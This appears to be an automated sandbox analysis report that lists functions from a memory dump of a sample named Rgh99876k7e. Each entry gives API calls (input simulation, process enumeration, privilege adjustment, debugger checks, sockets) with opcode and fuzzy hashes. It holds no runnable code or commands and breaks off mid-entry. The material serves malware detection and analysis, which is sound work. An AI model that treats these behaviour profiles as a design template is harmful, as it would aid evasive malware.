                          Function 0073E4FF Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: __floor_pentium4
                          • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                          • API String ID: 4168288129-2761157908
                          • Opcode ID: 7f91e7f47cd6f49e30a843bc7ebaa561d19931dbd600a95bbb01ccb3d688f8ad
                          • Instruction ID: 9d9daa902bea79abb36f8b91dfd2ae5f40e7c86f02dcce2652c797524472327a
                          • Opcode Fuzzy Hash: 7f91e7f47cd6f49e30a843bc7ebaa561d19931dbd600a95bbb01ccb3d688f8ad
                          • Instruction Fuzzy Hash: D1C23D72E046298FEB25CF28DD447EAB7B5EB44345F1441EAD44DE7282E778AE818F40
                          Function 0077648E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON
                          Download Yara Rule
                          APIs
                          • _wcslen.LIBCMT ref: 007764DC
                          • CoInitialize.OLE32(00000000), ref: 00776639
                          • CoCreateInstance.OLE32(0079FCF8,00000000,00000001,0079FB68,?), ref: 00776650
                          • CoUninitialize.OLE32 ref: 007768D4
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: CreateInitializeInstanceUninitialize_wcslen
                          • String ID: .lnk
                          • API String ID: 886957087-24824748
                          • Opcode ID: 900b62b842ee9f49f960aa08ceb4cbf3c25b18dc4d1d5596d74b78a54d17793a
                          • Instruction ID: ebd4d1e4603bf9f69932ab79622b584cd6926a378e9246840f51fa2e827e1a02
                          • Opcode Fuzzy Hash: 900b62b842ee9f49f960aa08ceb4cbf3c25b18dc4d1d5596d74b78a54d17793a
                          • Instruction Fuzzy Hash: 6BD14971508601DFC704EF24C885A6BB7E8FF94744F048A6DF5998B291DB74ED05CBA2
                          Function 007822DA Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                          Download Yara Rule
                          APIs
                          • GetForegroundWindow.USER32(?,?,00000000), ref: 007822E8
                            • Part of subcall function 0077E4EC: GetWindowRect.USER32(?,?), ref: 0077E504
                          • GetDesktopWindow.USER32 ref: 00782312
                          • GetWindowRect.USER32(00000000), ref: 00782319
                          • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00782355
                          • GetCursorPos.USER32(?), ref: 00782381
                          • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 007823DF
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Window$Rectmouse_event$CursorDesktopForeground
                          • String ID:
                          • API String ID: 2387181109-0
                          • Opcode ID: cb8bf2dd7f2576f07a523a37dd9b2747b0ee58ec5f770af04c988ce7fc344626
                          • Instruction ID: 3f977c73c3222014573ceeb824631c9b8b3aedc9676fd8ce97cb19739a2e294c
                          • Opcode Fuzzy Hash: cb8bf2dd7f2576f07a523a37dd9b2747b0ee58ec5f770af04c988ce7fc344626
                          • Instruction Fuzzy Hash: 5231E372544315AFCB21EF54C849F5BB7E9FF84310F00491AF98597182DB38E90ACBA6
                          Function 00779B2B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00709CB3: _wcslen.LIBCMT ref: 00709CBD
                          • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00779B78
                          • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00779C8B
                            • Part of subcall function 00773874: GetInputState.USER32 ref: 007738CB
                            • Part of subcall function 00773874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00773966
                          • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00779BA8
                          • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00779C75
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                          • String ID: *.*
                          • API String ID: 1972594611-438819550
                          • Opcode ID: abd8a1e5e919bd85455f54f75b3aa69060ea131c009424261e47b343615c8ccd
                          • Instruction ID: 3efcd79092053ab820623eea2da6d5a78028fcf5e1166e10cfcd32ef3e277b10
                          • Opcode Fuzzy Hash: abd8a1e5e919bd85455f54f75b3aa69060ea131c009424261e47b343615c8ccd
                          • Instruction Fuzzy Hash: B84161B1901209EFDF15DF74C989AEEBBF8EF05350F248156E509A2191DB389E84CF60
                          Function 0071997D Relevance: 7.9, APIs: 5, Instructions: 375COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00719BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00719BB2
                          • DefDlgProcW.USER32(?,?,?,?,?), ref: 00719A4E
                          • GetSysColor.USER32(0000000F), ref: 00719B23
                          • SetBkColor.GDI32(?,00000000), ref: 00719B36
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Color$LongProcWindow
                          • String ID:
                          • API String ID: 3131106179-0
                          • Opcode ID: aa5d306bc4fb6b25d84285639c2d718692fc1179688aaf66f75672815ab4662d
                          • Instruction ID: fa9fb979b4b9a8abd83038b5dbaaf2dcdb27c371972ee2d383b591a3d6ce0d24
                          • Opcode Fuzzy Hash: aa5d306bc4fb6b25d84285639c2d718692fc1179688aaf66f75672815ab4662d
                          • Instruction Fuzzy Hash: 98A12C70208444FEE7299A3CAC7DDFB26ADDF46341B158109FA02C66D1CA6DDD8BC276
                          Function 00781806 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0078304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0078307A
                            • Part of subcall function 0078304E: _wcslen.LIBCMT ref: 0078309B
                          • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0078185D
                          • WSAGetLastError.WSOCK32 ref: 00781884
                          • bind.WSOCK32(00000000,?,00000010), ref: 007818DB
                          • WSAGetLastError.WSOCK32 ref: 007818E6
                          • closesocket.WSOCK32(00000000), ref: 00781915
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                          • String ID:
                          • API String ID: 1601658205-0
                          • Opcode ID: 042b1b62d62d0aacc20682e75686a9320eaefb0aba0dad433a7c534ddbedcaf3
                          • Instruction ID: 6b340168424aa650cb88e27bc7bee981ad4dfabc3ca856a51c8f7e1cbda0bf49
                          • Opcode Fuzzy Hash: 042b1b62d62d0aacc20682e75686a9320eaefb0aba0dad433a7c534ddbedcaf3
                          • Instruction Fuzzy Hash: AB51B471A40200DFDB10AF24C88AF6A77E5AB45718F488198F9059F3D3C779AD82CBE1
                          Function 00791C41 Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Window$EnabledForegroundIconicVisibleZoomed
                          • String ID:
                          • API String ID: 292994002-0
                          • Opcode ID: 170f03be6d94d5a48aded5a94273640ccf5b368b987c2a2261f874fc301a06f8
                          • Instruction ID: 609fdeaf0c89cd65391bff04e3da9645145d3aa290809b97a760acc8e2562fce
                          • Opcode Fuzzy Hash: 170f03be6d94d5a48aded5a94273640ccf5b368b987c2a2261f874fc301a06f8
                          • Instruction Fuzzy Hash: A221F9317402029FDB218F1AE844B267BE5EF86314F59C059E846CB351CB79EC42CBA4
                          Function 00708060 Relevance: 7.4, Strings: 5, Instructions: 1151COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID:
                          • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                          • API String ID: 0-1546025612
                          • Opcode ID: 6be77e76cd9be841cb72e7f69f76ca1cdaae1610947962009d2fb982f0aa63b2
                          • Instruction ID: 100ad4d40d3c9ab1b6cf53aba296b0d8d4313d968d405f65fac21772c694f171
                          • Opcode Fuzzy Hash: 6be77e76cd9be841cb72e7f69f76ca1cdaae1610947962009d2fb982f0aa63b2
                          • Instruction Fuzzy Hash: 0BA29270E0061ACBDF64CF58C8807ADB7B1BF55314F2482AAE855A7285EB789D81CF52
                          Function 00768298 Relevance: 6.6, APIs: 1, Strings: 3, Instructions: 568stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrlenW.KERNEL32(?,?,?,00000000), ref: 007682AA
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: lstrlen
                          • String ID: ($tb|$|
                          • API String ID: 1659193697-2513361831
                          • Opcode ID: ef443e257b3bfe07452c03d9e807cb340814fb8910b894f16fbf758dd181c2e8
                          • Instruction ID: d839e61fd71fa095c30abd39204c39127c505eeced341db5944735f6a982f892
                          • Opcode Fuzzy Hash: ef443e257b3bfe07452c03d9e807cb340814fb8910b894f16fbf758dd181c2e8
                          • Instruction Fuzzy Hash: 06323574A00605DFCB68CF59C080A6AB7F0FF48710B15C56EE89ADB3A1EB74E981CB45
                          Function 0078A67C Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON
                          Download Yara Rule
                          APIs
                          • CreateToolhelp32Snapshot.KERNEL32 ref: 0078A6AC
                          • Process32FirstW.KERNEL32(00000000,?), ref: 0078A6BA
                            • Part of subcall function 00709CB3: _wcslen.LIBCMT ref: 00709CBD
                          • Process32NextW.KERNEL32(00000000,?), ref: 0078A79C
                          • CloseHandle.KERNEL32(00000000), ref: 0078A7AB
                            • Part of subcall function 0071CE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00743303,?), ref: 0071CE8A
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                          • String ID:
                          • API String ID: 1991900642-0
                          • Opcode ID: a316b06f99c7d6634209e29d5afa5f14bc3b6a56622999f5a5dbe1b3ce8df89b
                          • Instruction ID: 4807bf1d1ceb7b55dbac27bd87dd44c8d010b0e13f8b405c53724b2201fb8081
                          • Opcode Fuzzy Hash: a316b06f99c7d6634209e29d5afa5f14bc3b6a56622999f5a5dbe1b3ce8df89b
                          • Instruction Fuzzy Hash: 495130B1508301EFD710EF24C88AA5BBBE8FF89754F408A1DF58597291EB74E944CB92
                          Function 0076AA57 Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON
                          Download Yara Rule
                          APIs
                          • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 0076AAAC
                          • SetKeyboardState.USER32(00000080), ref: 0076AAC8
                          • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 0076AB36
                          • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 0076AB88
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: KeyboardState$InputMessagePostSend
                          • String ID:
                          • API String ID: 432972143-0
                          • Opcode ID: 1eb86e18d7c6f1987e6ed55a673383b7b7c89f8a0e597056ba97414b236ac0da
                          • Instruction ID: 42fe0a5fa1f3c6f8a3b8ac98880bc3ab1f366b9e225c8904d3acda11500f318b
                          • Opcode Fuzzy Hash: 1eb86e18d7c6f1987e6ed55a673383b7b7c89f8a0e597056ba97414b236ac0da
                          • Instruction Fuzzy Hash: 4431EBB0A40248BEFF35CA65CC05BFE77A6AB45310F04421BE98A665D1D37D8D81CB66
                          Function 0077CE44 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON
                          Download Yara Rule
                          APIs
                          • InternetReadFile.WININET(?,?,00000400,?), ref: 0077CE89
                          • GetLastError.KERNEL32(?,00000000), ref: 0077CEEA
                          • SetEvent.KERNEL32(?,?,00000000), ref: 0077CEFE
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: ErrorEventFileInternetLastRead
                          • String ID:
                          • API String ID: 234945975-0
                          • Opcode ID: 4471e6e6311524479db016ccd1d2fee1ec19b1901eba69fb6d71ceb4fb69471e
                          • Instruction ID: eb442695a758b6e0d1b0ca8c09716d4c06b4c511bac1d311c00054659091bc36
                          • Opcode Fuzzy Hash: 4471e6e6311524479db016ccd1d2fee1ec19b1901eba69fb6d71ceb4fb69471e
                          • Instruction Fuzzy Hash: 4121EDB25003059BEF32CFA5C948BA677F8EB04384F10841EE54A92151E7B8EE458B64
                          Function 00775C97 Relevance: 4.6, APIs: 3, Instructions: 138fileCOMMON
                          Download Yara Rule
                          APIs
                          • FindFirstFileW.KERNEL32(?,?), ref: 00775CC1
                          • FindNextFileW.KERNEL32(00000000,?), ref: 00775D17
                          • FindClose.KERNEL32(?), ref: 00775D5F
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Find$File$CloseFirstNext
                          • String ID:
                          • API String ID: 3541575487-0
                          • Opcode ID: 873264178caa024f790a865dc0005e46b457b55bbc44b80dc616350b9689854b
                          • Instruction ID: 8f557dc3466b4137d5828b3509a4e231b77cfb5664af1cf9e1917bb7f0647925
                          • Opcode Fuzzy Hash: 873264178caa024f790a865dc0005e46b457b55bbc44b80dc616350b9689854b
                          • Instruction Fuzzy Hash: 98518874604A01DFCB14CF28C498A96B7E4FF09314F14865EE95A8B3A1CB78FC04CB91
                          Function 00732622 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • IsDebuggerPresent.KERNEL32 ref: 0073271A
                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00732724
                          • UnhandledExceptionFilter.KERNEL32(?), ref: 00732731
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                          • String ID:
                          • API String ID: 3906539128-0
                          • Opcode ID: e30e88d4cdefeeae84418ad91618db82d3ca05cfeb30840254b8d6f3f943f7e9
                          • Instruction ID: 3771fb082489681d368f5fbca104276b4c1389ecfe6919453e10a5fd45f68121
                          • Opcode Fuzzy Hash: e30e88d4cdefeeae84418ad91618db82d3ca05cfeb30840254b8d6f3f943f7e9
                          • Instruction Fuzzy Hash: 8731B774911228ABCB21DF64DC8979DBBB8BF08310F5081DAE51CA7261E7349F818F95
                          Function 007751CD Relevance: 4.6, APIs: 3, Instructions: 76COMMON
                          Download Yara Rule
                          APIs
                          • SetErrorMode.KERNEL32(00000001), ref: 007751DA
                          • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00775238
                          • SetErrorMode.KERNEL32(00000000), ref: 007752A1
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: ErrorMode$DiskFreeSpace
                          • String ID:
                          • API String ID: 1682464887-0
                          • Opcode ID: ff717a0f2dc84cfc14f59e66a44e2b9169e6db2cba6507509c17b27d06813a40
                          • Instruction ID: 621aca8f941c331f89beb534dabfc33664963163c32dcb3c7e2efb862c954dcc
                          • Opcode Fuzzy Hash: ff717a0f2dc84cfc14f59e66a44e2b9169e6db2cba6507509c17b27d06813a40
                          • Instruction Fuzzy Hash: 42317F75A00518DFDB00DF54D888EADBBF4FF08314F088099E809AB3A2CB35E856CB51
                          Function 007616C3 Relevance: 4.6, APIs: 3, Instructions: 68COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0071FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00720668
                            • Part of subcall function 0071FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00720685
                          • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0076170D
                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0076173A
                          • GetLastError.KERNEL32 ref: 0076174A
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                          • String ID:
                          • API String ID: 577356006-0
                          • Opcode ID: 588b399d07918a5745f0e75e2a88494c907b6009164f29cbae6449d60fccba26
                          • Instruction ID: ed699c9636141066ca403db2def240ebcd55c35581e976961a8f8a71987fa6cb
                          • Opcode Fuzzy Hash: 588b399d07918a5745f0e75e2a88494c907b6009164f29cbae6449d60fccba26
                          • Instruction Fuzzy Hash: 9411C1B2500304AFD7189F58EC8ADAAB7B9EB04714B24852EE45653281EB74FC418B24
                          Function 0076D5EB Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON
                          Download Yara Rule
                          APIs
                          • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0076D608
                          • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 0076D645
                          • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0076D650
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: CloseControlCreateDeviceFileHandle
                          • String ID:
                          • API String ID: 33631002-0
                          • Opcode ID: bb98524314c2a037e66ebfea2f7b54807d89789ff4faa0a5565de0600314b546
                          • Instruction ID: c72eb4ad336891608dff1efd019a5340a8fffdb25502bb4dcaa61d936398036d
